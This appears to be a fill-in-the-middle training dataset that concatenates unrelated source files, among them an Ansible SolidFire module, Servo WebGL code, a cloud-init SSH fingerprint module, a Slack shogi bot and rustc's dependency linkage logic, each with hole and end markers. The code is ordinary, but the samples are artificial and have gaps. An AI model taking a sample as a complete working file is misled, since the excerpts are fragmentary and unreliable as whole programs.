changed = True elif account_detail.status is not None and self.status is not None \ and account_detail.status != self.status: update_account = True changed = True elif account_detail.initiator_secret is not None and self.initiator_secret is not None \ and account_detail.initiator_secret != self.initiator_secret: update_account = True changed = True elif account_detail.target_secret is not None and self.target_secret is not None \ and account_detail.target_secret != self.target_secret: update_account = True changed = True elif account_detail.attributes is not None and self.attributes is not None \ and account_detail.attributes != self.attributes: update_account = True changed = True else: if self.state == 'present': changed = True if changed: if self.module.check_mode: pass else: if self.state == 'present': if not account_exists: self.create_account() elif update_account: self.update_account() elif self.state == 'absent': self.delete_account() self.module.exit_json(changed=changed) def main(): v = SolidFireAccount() v.apply() if __name__ == '__main__': main()<|fim▁end|>
sf_account_manager:
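The apply() method in the record above is the standard Ansible idempotency loop: look the account up, diff only the requested fields, and pick create/update/delete accordingly. The bare decision logic, stripped of the SolidFire calls (all names illustrative):

def decide(state, desired, existing):
    # Returns (changed, action) without touching the backend.
    if state == "absent":
        return (existing is not None, "delete")
    if existing is None:
        return (True, "create")
    dirty = any(existing.get(k) != v
                for k, v in desired.items() if v is not None)
    return (dirty, "update" if dirty else None)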
<|file_name|>wrapper.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ use core::nonzero::NonZero; use dom::bindings::js::{MutNullableJS, Root}; use dom::bindings::reflector::DomObject; use dom::bindings::trace::JSTraceable; use dom::webglrenderingcontext::WebGLRenderingContext; use heapsize::HeapSizeOf; use js::jsapi::JSObject; use std::any::Any; use super::{WebGLExtension, WebGLExtensions}; /// Trait used internally by WebGLExtensions to store and /// handle the different WebGL extensions in a common list. pub trait WebGLExtensionWrapper: JSTraceable + HeapSizeOf { fn instance_or_init(&self, ctx: &WebGLRenderingContext, ext: &WebGLExtensions) -> NonZero<*mut JSObject>; fn is_supported(&self, &WebGLExtensions) -> bool; fn is_enabled(&self) -> bool; fn enable(&self, ext: &WebGLExtensions); fn name(&self) -> &'static str; fn as_any(&self) -> &Any; } #[must_root] #[derive(HeapSizeOf, JSTraceable)] pub struct TypedWebGLExtensionWrapper<T: WebGLExtension> { extension: MutNullableJS<T::Extension> } /// Typed WebGL Extension implementation. /// Exposes the exact MutNullableJS<DOMObject> type defined by the extension. impl<T: WebGLExtension> TypedWebGLExtensionWrapper<T> { pub fn new() -> TypedWebGLExtensionWrapper<T> { TypedWebGLExtensionWrapper { extension: MutNullableJS::new(None) } }<|fim▁hole|>} impl<T> WebGLExtensionWrapper for TypedWebGLExtensionWrapper<T> where T: WebGLExtension + JSTraceable + HeapSizeOf + 'static { #[allow(unsafe_code)] fn instance_or_init(&self, ctx: &WebGLRenderingContext, ext: &WebGLExtensions) -> NonZero<*mut JSObject> { let mut enabled = true; let extension = self.extension.or_init(|| { enabled = false; T::new(ctx) }); if !enabled { self.enable(ext); } unsafe { NonZero::new_unchecked(extension.reflector().get_jsobject().get()) } } fn is_supported(&self, ext: &WebGLExtensions) -> bool { self.is_enabled() || T::is_supported(ext) } fn is_enabled(&self) -> bool { self.extension.get().is_some() } fn enable(&self, ext: &WebGLExtensions) { T::enable(ext); } fn name(&self) -> &'static str { T::name() } fn as_any<'a>(&'a self) -> &'a Any { self } } impl<T> TypedWebGLExtensionWrapper<T> where T: WebGLExtension + JSTraceable + HeapSizeOf + 'static { pub fn dom_object(&self) -> Option<Root<T::Extension>> { self.extension.get() } }<|fim▁end|>
<|file_name|>buildsettings.py<|end_file_name|><|fim▁begin|># settings file for builds. # if you want to have custom builds, copy this file to "localbuildsettings.py" and make changes there. # possible fields: # resourceBaseUrl - optional - the URL base for external resources (all resources embedded in standard IITC) # distUrlBase - optional - the base URL to use for update checks # buildMobile - optional - if set, mobile builds are built with 'ant'. requires the Android SDK and appropriate mobile/local.properties file configured # preBuild - optional - an array of strings to run as commands, via os.system, before building the scripts # postBuild - optional - an array of string to run as commands, via os.system, after all builds are complete buildSettings = { # local: use this build if you're not modifying external resources # no external resources allowed - they're not needed any more 'local': {<|fim▁hole|> }, # local8000: if you need to modify external resources, this build will load them from # the web server at http://0.0.0.0:8000/dist # (This shouldn't be required any more - all resources are embedded. but, it remains just in case some new feature # needs external resources) 'local8000': { 'resourceUrlBase': 'http://0.0.0.0:8000/dist', 'distUrlBase': None, }, # mobile: default entry that also builds the mobile .apk # you will need to have the android-sdk installed, and the file mobile/local.properties created as required 'mobile': { 'resourceUrlBase': None, 'distUrlBase': None, 'buildMobile': 'debug', }, # if you want to publish your own fork of the project, and host it on your own web site # create a localbuildsettings.py file containing something similar to this # note: Firefox+Greasemonkey require the distUrlBase to be "https" - they won't check for updates on regular "http" URLs #'example': { # 'resourceBaseUrl': 'http://www.example.com/iitc/dist', # 'distUrlBase': 'https://secure.example.com/iitc/dist', #}, } # defaultBuild - the name of the default build to use if none is specified on the build.py command line # (in here as an example - it only works in localbuildsettings.py) #defaultBuild = 'local'<|fim▁end|>
'resourceUrlBase': 'http://localhost:8100', 'distUrlBase': 'http://localhost:8100',
<|file_name|>ConfigHelper.java<|end_file_name|><|fim▁begin|>package net.joaopms.PvPUtilities.helper; import net.minecraftforge.common.config.Configuration; import java.io.File; public class ConfigHelper { private static Configuration config; public static void init(File file) { config = new Configuration(file, true); config.load(); initConfig(); config.save(); } public static Configuration getConfig() { return config; } private static void initConfig() { config.get("overcastStatistics", "showOvercastLogo", true); config.get("overcastStatistics", "showKills", true); config.get("overcastStatistics", "showDeaths", true); config.get("overcastStatistics", "showFriends", false); config.get("overcastStatistics", "showKD", true); config.get("overcastStatistics", "showKK", false); config.get("overcastStatistics", "showServerJoins", false); config.get("overcastStatistics", "showDaysPlayed", false); config.get("overcastStatistics", "showRaindrops", false); <|fim▁hole|>}<|fim▁end|>
config.get("overcastStatistics", "overlayOpacity", 0.5F); }
<|file_name|>services.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit } from '@angular/core'; @Component({ selector: 'sky-services', template: ` <div id="services" class="container-fluid py-5"> <div class="row row align-items-start justify-content-center"> <div class="col col-lg-4 col-md-6 col-sm-12" *ngFor="let service of services"> <div class="card text-center p-3 no-border"> <div class="card-body"> <h4 class="card-title"> <i class="icon {{service.icon}}"></i> <span class="ml-2">{{service.title}}</span> </h4> <p class="card-text">{{service.description}}</p> </div> </div> </div> </div> </div> `, styles: [ '.no-border { border: none; }' ] }) export class ServicesComponent implements OnInit { services: any[]; constructor() { } ngOnInit() { this.services = [ { icon: 'ion-coffee', title: 'Consulting',<|fim▁hole|> icon: 'ion-code', title: 'Code Review', description: 'Whether you have recently started your project or are nearly finished, SkyPress will ensure your web application is up to par with proper code and security standards while troubleshooting and debugging any issues.' }, { icon: 'ion-ribbon-b', title: 'Data Best Practices', description: 'Properly structured data models are the cornerstones to a successful application. They allow for rapid development throughout the entire project, and reduce the impact that changes will have on your application in the future. SkyPress works with our clients to take a data first approach in the design of their application.' }, { icon: 'ion-cloud', title: 'Scalable Architecture', description: 'Performant code isn’t something that works amazingly well just for yourself, but for yourself plus a million other users at the same time. Focusing on the scalability of your application from the beginning phases of it’s architecture is the most efficient way of ensuring that it is baked into every aspect of it’s development.' }, { icon: 'ion-network', title: 'Business Integrations', description: 'Businesses aren’t operated by a single program. Instead, we use the appropriate services that satisfy your needs. SkyPress can help with the integration of your web application and your existing business tools in order to streamline your daily workflow.' }, { icon: 'ion-fireball', title: 'WAR Framework', description: 'SkyPress is passionate about expanding the capabilities of WordPress and growing the community. We built and released an open source Framework that simplifies the development of web applications built on top of WordPress. As it’s creators and maintainers, we want to help you with the implementation and extension of this powerful solution.' } ]; } }<|fim▁end|>
description: 'SkyPress can assist you in building future proof solutions for your web applications. Being a well known thought leader on WordPress web applications and the creator of the WAR framework, we can work with your team to rapidly develop your idea into a finished product.' }, {
<|file_name|>statefile.go<|end_file_name|><|fim▁begin|>// replication-manager - Replication Manager Monitoring and CLI for MariaDB and MySQL // Authors: Guillaume Lefranc <[email protected]> // Stephane Varoqui <[email protected]> // This source code is licensed under the GNU General Public License, version 3. // Redistribution/Reuse of this code is permitted under the GNU v3 license, as // an additional term, ALL code must carry the original Author(s) credit in comment form. // See LICENSE in this directory for the integral text. package cluster import ( "encoding/binary" "os" ) type stateFile struct { Handle *os.File Name string Count int32 Timestamp int64 } func newStateFile(name string) *stateFile { sf := new(stateFile) sf.Name = name return sf } func (sf *stateFile) access() error { var err error sf.Handle, err = os.OpenFile(sf.Name, os.O_RDWR|os.O_CREATE, 0666) if err != nil { return err } return nil } func (sf *stateFile) write() error { err := sf.Handle.Truncate(0) sf.Handle.Seek(0, 0) if err != nil { return err } err = binary.Write(sf.Handle, binary.LittleEndian, sf.Count) if err != nil { return err } err = binary.Write(sf.Handle, binary.LittleEndian, sf.Timestamp) if err != nil { return err } return nil } func (sf *stateFile) read() error { sf.Handle.Seek(0, 0) err := binary.Read(sf.Handle, binary.LittleEndian, &sf.Count) if err != nil { return err } err = binary.Read(sf.Handle, binary.LittleEndian, &sf.Timestamp) if err != nil { return err } return nil<|fim▁hole|><|fim▁end|>
}
<|file_name|>cc_keys_to_console.py<|end_file_name|><|fim▁begin|># vi: ts=4 expandtab # # Copyright (C) 2011 Canonical Ltd. # Copyright (C) 2012 Hewlett-Packard Development Company, L.P. # # Author: Scott Moser <[email protected]> # Author: Juerg Haefliger <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os from cloudinit.settings import PER_INSTANCE from cloudinit import util frequency = PER_INSTANCE # This is a tool that cloud init provides HELPER_TOOL_TPL = '%s/cloud-init/write-ssh-key-fingerprints' def _get_helper_tool_path(distro): try: base_lib = distro.usr_lib_exec except AttributeError: base_lib = '/usr/lib' return HELPER_TOOL_TPL % base_lib def handle(name, cfg, cloud, log, _args): helper_path = _get_helper_tool_path(cloud.distro) if not os.path.exists(helper_path): log.warn(("Unable to activate module %s," " helper tool not found at %s"), name, helper_path) return fp_blacklist = util.get_cfg_option_list(cfg, "ssh_fp_console_blacklist", []) key_blacklist = util.get_cfg_option_list(cfg,<|fim▁hole|> "ssh_key_console_blacklist", ["ssh-dss"]) try: cmd = [helper_path] cmd.append(','.join(fp_blacklist)) cmd.append(','.join(key_blacklist)) (stdout, _stderr) = util.subp(cmd) util.multi_log("%s\n" % (stdout.strip()), stderr=False, console=True) except Exception: log.warn("Writing keys to the system console failed!") raise<|fim▁end|>
<|file_name|>ActionBar.stories.js<|end_file_name|><|fim▁begin|>import React from 'react'; import { action } from '@storybook/addon-actions'; import { Action } from '../Actions'; import ActionBar from './ActionBar.component'; const primary = { label: 'Primary', icon: 'talend-cog', bsStyle: 'primary', 'data-feature': 'actionbar.primary', onClick: action('You clicked me'), }; const actions = { left: [ primary, { label: 'Secondary1', icon: 'talend-cog', 'data-feature': 'actionbar.secondary', onClick: action('You clicked me'), }, { displayMode: ActionBar.DISPLAY_MODES.SPLIT_DROPDOWN, label: 'Secondary3', icon: 'talend-cog', 'data-feature': 'actionbar.splitdropdown', onClick: action('on split button click'), items: [ { label: 'From Local', 'data-feature': 'actionbar.splitdropdown.items', onClick: action('From Local click'), }, { label: 'From Remote', 'data-feature': 'actionbar.splitdropdown.items', onClick: action('From Remote click'), }, ], emptyDropdownLabel: 'No option', }, { id: 'dropdown', displayMode: ActionBar.DISPLAY_MODES.DROPDOWN, label: 'Dropdown', icon: 'talend-cog', items: [ { label: 'From Local', onClick: action('From Local click'), }, { label: 'From Remote', onClick: action('From Remote click'), }, ], }, ], right: [ { label: 'Secondary4', icon: 'talend-upload', displayMode: 'file', onChange: action('You changed me'), }, { label: 'Secondary5', icon: 'talend-cog', onClick: action('You clicked me'), }, ], }; const multi3 = { label: 'multi3', icon: 'talend-cog', onClick: action('You clicked me'), }; const multiSelectActions = { left: [ { label: 'multi1', icon: 'talend-cog', onClick: action('You clicked me'), }, { label: 'multi2', icon: 'talend-cog', onClick: action('You clicked me'), }, ], center: [ { label: 'multi5', icon: 'talend-cog', onClick: action('You clicked me'), }, ], right: [ multi3, { label: 'multi4', icon: 'talend-cog', onClick: action('You clicked me'), }, ], }; const btnGroupActions = { left: [ { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'hidden mean tooltips', icon: 'talend-cog', hideLabel: true, onClick: action('cog'), }, { label: 'you are a super star', icon: 'talend-badge', hideLabel: true, onClick: action('badge'), }, { label: 'but don t click this', icon: 'talend-cross', hideLabel: true, onClick: action('boom'), }, { label: 'edit me', icon: 'talend-pencil', hideLabel: true, onClick: action('oh yes'), }, ], }, { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'you can also add', icon: 'talend-plus-circle', hideLabel: true, onClick: action('add !'), }, { label: 'search', icon: 'talend-search', hideLabel: true, onClick: action('search'), }, { label: 'star', icon: 'talend-star', hideLabel: true, onClick: action('star'), }, ], }, ], center: [ { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'go to dataprep', icon: 'talend-dataprep', hideLabel: true, onClick: action('dataprep'), }, { label: 'go to elastic', icon: 'talend-elastic', hideLabel: true, onClick: action('elastic'), }, { label: 'go to cloud engine', icon: 'talend-cloud-engine', hideLabel: true, onClick: action('cloud-engine'), }, ], }, ], right: [ { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'table', icon: 'talend-table', hideLabel: true, onClick: action('table'), }, { label: 'trash', icon: 'talend-trash', hideLabel: true, onClick: action('trash'), }, ], }, ], }; const basicProps = { actions, multiSelectActions, }; const multiDelete = { label: 'Delete', icon: 'talend-trash', onClick: action('multiple delete'), className: 
'btn-icon-text', }; const multiDuplicate = { label: 'Duplicate', icon: 'talend-files-o', onClick: action('multiple duplicate'), className: 'btn-icon-text', }; const multiUpdate = { label: 'Update', icon: 'talend-file-move', onClick: action('multiple update'), className: 'btn-icon-text', }; const multiFavorite = { label: 'Favorite', icon: 'talend-star', onClick: action('multiple favorite'), className: 'btn-icon-text', }; const multiCertify = { label: 'Certify', icon: 'talend-badge', onClick: action('multiple certify'), className: 'btn-icon-text', }; const massActions = { left: [multiDelete, multiDuplicate, multiUpdate], }; const appMassActions = { left: [multiFavorite, multiCertify], }; export default { title: 'Form/Controls/ActionBar', }; export const Default = () => ( <nav> <p>No Selected, Layout: Left Space Right</p> <div id="default"> <ActionBar {...basicProps} selected={0} /> </div> <p>1 Selected, Layout: Left Center Right</p> <div id="selected"> <ActionBar {...basicProps} selected={1} /> </div> <p>1 Selected, Layout: Right</p> <div id="right"> <ActionBar selected={1} actions={{ left: [primary] }} multiSelectActions={{ right: [multi3] }} /> </div> <p>Toolbar with btn-group and only icons/ Layout: left, center, right</p> <div id="btn-group"> <ActionBar actions={btnGroupActions} /> </div> <p>3 items selected, with mass/bulk Actions</p> <div id="mass-actions"> <ActionBar selected={3} multiSelectActions={massActions} appMultiSelectActions={appMassActions} /> </div> </nav> ); export const Custom = () => ( <nav> <div id="default"><|fim▁hole|> <ActionBar.Content tag="button" className="btn btn-default" left> Hello button </ActionBar.Content> <ActionBar.Content left> <Action label="hello Action" icon="talend-trash" onClick={action('onClick')} /> </ActionBar.Content> <ActionBar.Content tag="form" role="search" center> <div className="form-group"> <input type="text" className="form-control" placeholder="Search" /> </div> <button type="submit" className="btn btn-default"> Submit </button> </ActionBar.Content> <ActionBar.Content tag="p" right> Hello paragraph </ActionBar.Content> </ActionBar> </div> </nav> );<|fim▁end|>
<ActionBar> <ActionBar.Content tag="a" left href="#/foo/bar"> Hello anchor </ActionBar.Content>
<|file_name|>incompatibleExports2.ts<|end_file_name|><|fim▁begin|><|fim▁hole|>declare module "foo" { export interface x { a: string } interface y { a: Date } export = y; }<|fim▁end|>
<|file_name|>shogi.py<|end_file_name|><|fim▁begin|>import re import functools from slackbot.bot import respond_to from app.modules.shogi_input import ShogiInput, UserDifferentException, KomaCannotMoveException from app.modules.shogi_output import ShogiOutput from app.slack_utils.user import User from app.helper import channel_info, should_exist_shogi @respond_to('start with <?@?([\d\w_-]+)>?') @channel_info def start_shogi(channel, message, opponent_name): slacker = message._client.webapi user = User(slacker) opponent_id = user.username_to_id(opponent_name) if opponent_id is None: # In case of mention. In mention, slack transform username to userid # like @username to <@UOIFJ83F> opponent_id = opponent_name if not user.user_in_channel(opponent_id, channel.channel_id): message.reply("Error, sorry. Opponent is not found in this channel") return shogi = ShogiInput.init(channel_id=channel.channel_id, users=[{ "id": channel.own_id, "name": user.id_to_username(channel.own_id), }, { "id": opponent_id, "name": user.id_to_username(opponent_id), }]) if shogi is None: message.reply("Shogi started already by a user. Sorry.\nIf you want to quit shogi which already exists, please say this command `resign`") else: message.reply("Shogi started: " + shogi.id) board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) koma_names = [ "歩兵?", "と金?", "成?香車?", "成?桂馬?", "成?銀将?", "金将?", "角行?", "馬", "飛車?", "龍", "王将?", "玉将?", ] koma_names_string_regex = "|".join(koma_names) @respond_to("^([一二三四五六七八九123456789123456789]{2})?(同)?(" + koma_names_string_regex + ")([上右下左引寄直打]{1,2})?つ?(成)?") @channel_info @should_exist_shogi def koma_move(channel, message, position, dou, koma, sub_position=None, promote=None): movement_str = "".join( [x for x in [position, dou, koma, sub_position, promote] if x is not None]) try: ShogiInput.move(movement_str, channel.channel_id, channel.own_id) except UserDifferentException: message.reply("You cannot move this because *it's not your turn*") except KomaCannotMoveException: message.reply("You cannot move this with your message *{}*".format(movement_str)) finally: board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) @respond_to("set (all) mode") @channel_info @should_exist_shogi def set_mode(channel, message, arg): if arg == "all": ShogiInput.setAllMode(channel.channel_id) message.reply("Done! 
All member can move now!") @respond_to("今?.*の?.*状態.*を?教.*え?て?") @respond_to("now") @respond_to("局面.*") @respond_to("board") @channel_info @should_exist_shogi def board_info(channel, message): board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) @respond_to(".*降参.*") @respond_to(".*resign.*") @respond_to(".*負けました.*") @respond_to(".*まけました.*") @respond_to(".*まいりました.*") @respond_to(".*参りました.*") @respond_to(".*ありません.*") @channel_info @should_exist_shogi def resign(channel, message): message.send("最終局面") board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) ShogiInput.clear(channel.channel_id) @respond_to("待った") @channel_info @should_exist_shogi def matta(channel, message): try: ShogiInput.matta(channel.channel_id, channel.own_id) message.send("mattaed") except UserDifferentException: message.reply("You cannot matta because *it's not your turn*") except KomaCannotMoveException: message.reply("You cannot matta because koma not moved") finally: board = ShogiInput.get_shogi_board(channel.channel_id) board_str = ShogiOutput.make_board_emoji(board) message.send(board_str) @respond_to(".*ひふみん[eye, アイ, あい]?") @respond_to(".*反転.*") @channel_info @should_exist_shogi def hifumin(channel, message): board = ShogiInput.get_shogi_board(channel.channel_id)<|fim▁hole|><|fim▁end|>
board_str = ShogiOutput.make_board_emoji_reverse(board) message.send(board_str)
<|file_name|>karma.conf.js<|end_file_name|><|fim▁begin|>// Karma configuration file, see link for more information // https://karma-runner.github.io/1.0/config/configuration-file.html module.exports = function (config) { config.set({ basePath: '', frameworks: ['jasmine', '@angular-devkit/build-angular'], plugins: [ 'karma-jasmine', 'karma-chrome-launcher',<|fim▁hole|> ], client: { clearContext: false // leave Jasmine Spec Runner output visible in browser }, reporters: ['spec'], port: 9876, colors: true, logLevel: config.LOG_INFO, autoWatch: true, browsers: ['Chrome'], singleRun: false }); };<|fim▁end|>
'karma-spec-reporter', '@angular-devkit/build-angular/plugins/karma',
<|file_name|>KarisikSayma.java<|end_file_name|><|fim▁begin|>package Thread; /** * Created by cnkaptan on 5/8/15. */ public class KarisikSayma {<|fim▁hole|> public static void main(String[] args){ ThreadTest thrd = new ThreadTest("Thread"); Thread runnableThread = new Thread(new RunnableTest("Runnable")); thrd.start(); runnableThread.start(); } } class RunnableTest implements Runnable{ String name; public RunnableTest(String name){ this.name = name; } @Override public void run() { for (int i = 0; i < 21 ; i++){ System.out.println(name+"\t"+i); } } } class ThreadTest extends Thread{ String name; public ThreadTest(String name){ this.name = name; } @Override public void run() { for (int i = 0; i < 21 ; i++){ System.out.println(this.getName()+"\t"+i); } } }<|fim▁end|>
<|file_name|>AndroidfilehostCom.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -* # # Test links: # https://www.androidfilehost.com/?fid=95916177934518197 import re from module.plugins.internal.SimpleHoster import SimpleHoster class AndroidfilehostCom(SimpleHoster): __name__ = "AndroidfilehostCom" __type__ = "hoster" __version__ = "0.05" __status__ = "testing" __pattern__ = r'https?://(?:www\.)?androidfilehost\.com/\?fid=\d+' __config__ = [("activated" , "bool", "Activated" , True), ("use_premium" , "bool", "Use premium account if available" , True), ("fallback" , "bool", "Fallback to free download if premium fails" , True), ("chk_filesize", "bool", "Check file size" , True), ("max_wait" , "int" , "Reconnect if waiting time is greater than minutes", 10 )] __description__ = """Androidfilehost.com hoster plugin""" __license__ = "GPLv3" __authors__ = [("zapp-brannigan", "[email protected]")] NAME_PATTERN = r'<br />(?P<N>.*?)</h1>' SIZE_PATTERN = r'<h4>size</h4>\s*<p>(?P<S>[\d.,]+)(?P<U>[\w^_]+)</p>' HASHSUM_PATTERN = r'<h4>(?P<H>.*?)</h4>\s*<p><code>(?P<D>.*?)</code></p>' OFFLINE_PATTERN = r'404 not found' WAIT_PATTERN = r'users must wait <strong>(\d+) secs' def setup(self): self.multiDL = True self.resume_download = True self.chunk_limit = 1 def handle_free(self, pyfile): wait = re.search(self.WAIT_PATTERN, self.data) self.log_debug("Waiting time: %s seconds" % wait.group(1)) fid = re.search(r'id="fid" value="(\d+)" />', self.data).group(1) self.log_debug("FID: %s" % fid) html = self.load("https://www.androidfilehost.com/libs/otf/mirrors.otf.php", post={'submit': 'submit', 'action': 'getdownloadmirrors', 'fid' : fid})<|fim▁hole|> self.link = re.findall('"url":"(.*?)"', html)[0].replace("\\", "") mirror_host = self.link.split("/")[2] self.log_debug("Mirror Host: %s" % mirror_host) html = self.load("https://www.androidfilehost.com/libs/otf/stats.otf.php", get={'fid' : fid, 'w' : 'download', 'mirror': mirror_host})<|fim▁end|>
<|file_name|>dependency_format.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. //! Resolution of mixing rlibs and dylibs<|fim▁hole|>//! dependencies. The linking phase must guarantee, however, that a library only //! show up once in the object file. For example, it is illegal for library A to //! be statically linked to B and C in separate dylibs, and then link B and C //! into a crate D (because library A appears twice). //! //! The job of this module is to calculate what format each upstream crate //! should be used when linking each output type requested in this session. This //! generally follows this set of rules: //! //! 1. Each library must appear exactly once in the output. //! 2. Each rlib contains only one library (it's just an object file) //! 3. Each dylib can contain more than one library (due to static linking), //! and can also bring in many dynamic dependencies. //! //! With these constraints in mind, it's generally a very difficult problem to //! find a solution that's not "all rlibs" or "all dylibs". I have suspicions //! that NP-ness may come into the picture here... //! //! The current selection algorithm below looks mostly similar to: //! //! 1. If static linking is required, then require all upstream dependencies //! to be available as rlibs. If not, generate an error. //! 2. If static linking is requested (generating an executable), then //! attempt to use all upstream dependencies as rlibs. If any are not //! found, bail out and continue to step 3. //! 3. Static linking has failed, at least one library must be dynamically //! linked. Apply a heuristic by greedily maximizing the number of //! dynamically linked libraries. //! 4. Each upstream dependency available as a dynamic library is //! registered. The dependencies all propagate, adding to a map. It is //! possible for a dylib to add a static library as a dependency, but it //! is illegal for two dylibs to add the same static library as a //! dependency. The same dylib can be added twice. Additionally, it is //! illegal to add a static dependency when it was previously found as a //! dylib (and vice versa) //! 5. After all dynamic dependencies have been traversed, re-traverse the //! remaining dependencies and add them statically (if they haven't been //! added already). //! //! While not perfect, this algorithm should help support use-cases such as leaf //! dependencies being static while the larger tree of inner dependencies are //! all dynamic. This isn't currently very well battle tested, so it will likely //! fall short in some use cases. //! //! Currently, there is no way to specify the preference of linkage with a //! particular library (other than a global dynamic/static switch). //! Additionally, the algorithm is geared towards finding *any* solution rather //! than finding a number of solutions (there are normally quite a few). use std::collections::HashMap; use syntax::ast; use driver::session; use driver::config; use metadata::cstore; use metadata::csearch; use middle::ty; /// A list of dependencies for a certain crate type. 
/// /// The length of this vector is the same as the number of external crates used. /// The value is None if the crate does not need to be linked (it was found /// statically in another dylib), or Some(kind) if it needs to be linked as /// `kind` (either static or dynamic). pub type DependencyList = Vec<Option<cstore::LinkagePreference>>; /// A mapping of all required dependencies for a particular flavor of output. /// /// This is local to the tcx, and is generally relevant to one session. pub type Dependencies = HashMap<config::CrateType, DependencyList>; pub fn calculate(tcx: &ty::ctxt) { let mut fmts = tcx.dependency_formats.borrow_mut(); for &ty in tcx.sess.crate_types.borrow().iter() { fmts.insert(ty, calculate_type(&tcx.sess, ty)); } tcx.sess.abort_if_errors(); } fn calculate_type(sess: &session::Session, ty: config::CrateType) -> DependencyList { match ty { // If the global prefer_dynamic switch is turned off, first attempt // static linkage (this can fail). config::CrateTypeExecutable if !sess.opts.cg.prefer_dynamic => { match attempt_static(sess) { Some(v) => return v, None => {} } } // No linkage happens with rlibs, we just needed the metadata (which we // got long ago), so don't bother with anything. config::CrateTypeRlib => return Vec::new(), // Staticlibs must have all static dependencies. If any fail to be // found, we generate some nice pretty errors. config::CrateTypeStaticlib => { match attempt_static(sess) { Some(v) => return v, None => {} } sess.cstore.iter_crate_data(|cnum, data| { let src = sess.cstore.get_used_crate_source(cnum).unwrap(); if src.rlib.is_some() { return } sess.err(format!("dependency `{}` not found in rlib format", data.name).as_slice()); }); return Vec::new(); } // Everything else falls through below config::CrateTypeExecutable | config::CrateTypeDylib => {}, } let mut formats = HashMap::new(); // Sweep all crates for found dylibs. Add all dylibs, as well as their // dependencies, ensuring there are no conflicts. The only valid case for a // dependency to be relied upon twice is for both cases to rely on a dylib. sess.cstore.iter_crate_data(|cnum, data| { let src = sess.cstore.get_used_crate_source(cnum).unwrap(); if src.dylib.is_some() { add_library(sess, cnum, cstore::RequireDynamic, &mut formats); debug!("adding dylib: {}", data.name); let deps = csearch::get_dylib_dependency_formats(&sess.cstore, cnum); for &(depnum, style) in deps.iter() { add_library(sess, depnum, style, &mut formats); debug!("adding {}: {}", style, sess.cstore.get_crate_data(depnum).name.clone()); } } }); // Collect what we've got so far in the return vector. let mut ret = range(1, sess.cstore.next_crate_num()).map(|i| { match formats.find(&i).map(|v| *v) { v @ Some(cstore::RequireDynamic) => v, _ => None, } }).collect::<Vec<_>>(); // Run through the dependency list again, and add any missing libraries as // static libraries. sess.cstore.iter_crate_data(|cnum, data| { let src = sess.cstore.get_used_crate_source(cnum).unwrap(); if src.dylib.is_none() && !formats.contains_key(&cnum) { assert!(src.rlib.is_some()); add_library(sess, cnum, cstore::RequireStatic, &mut formats); *ret.get_mut(cnum as uint - 1) = Some(cstore::RequireStatic); debug!("adding staticlib: {}", data.name); } }); // When dylib B links to dylib A, then when using B we must also link to A. // It could be the case, however, that the rlib for A is present (hence we // found metadata), but the dylib for A has since been removed. 
// // For situations like this, we perform one last pass over the dependencies, // making sure that everything is available in the requested format. for (cnum, kind) in ret.iter().enumerate() { let cnum = cnum as ast::CrateNum; let src = sess.cstore.get_used_crate_source(cnum + 1).unwrap(); match *kind { None => continue, Some(cstore::RequireStatic) if src.rlib.is_some() => continue, Some(cstore::RequireDynamic) if src.dylib.is_some() => continue, Some(kind) => { let data = sess.cstore.get_crate_data(cnum + 1); sess.err(format!("crate `{}` required to be available in {}, \ but it was not available in this form", data.name, match kind { cstore::RequireStatic => "rlib", cstore::RequireDynamic => "dylib", }).as_slice()); } } } return ret; } fn add_library(sess: &session::Session, cnum: ast::CrateNum, link: cstore::LinkagePreference, m: &mut HashMap<ast::CrateNum, cstore::LinkagePreference>) { match m.find(&cnum) { Some(&link2) => { // If the linkages differ, then we'd have two copies of the library // if we continued linking. If the linkages are both static, then we // would also have two copies of the library (static from two // different locations). // // This error is probably a little obscure, but I imagine that it // can be refined over time. if link2 != link || link == cstore::RequireStatic { let data = sess.cstore.get_crate_data(cnum); sess.err(format!("cannot satisfy dependencies so `{}` only \ shows up once", data.name).as_slice()); sess.note("having upstream crates all available in one format \ will likely make this go away"); } } None => { m.insert(cnum, link); } } } fn attempt_static(sess: &session::Session) -> Option<DependencyList> { let crates = sess.cstore.get_used_crates(cstore::RequireStatic); if crates.iter().all(|&(_, ref p)| p.is_some()) { Some(crates.into_iter().map(|_| Some(cstore::RequireStatic)).collect()) } else { None } }<|fim▁end|>
//! //! When producing a final artifact, such as a dynamic library, the compiler has //! a choice between linking an rlib or linking a dylib of all upstream
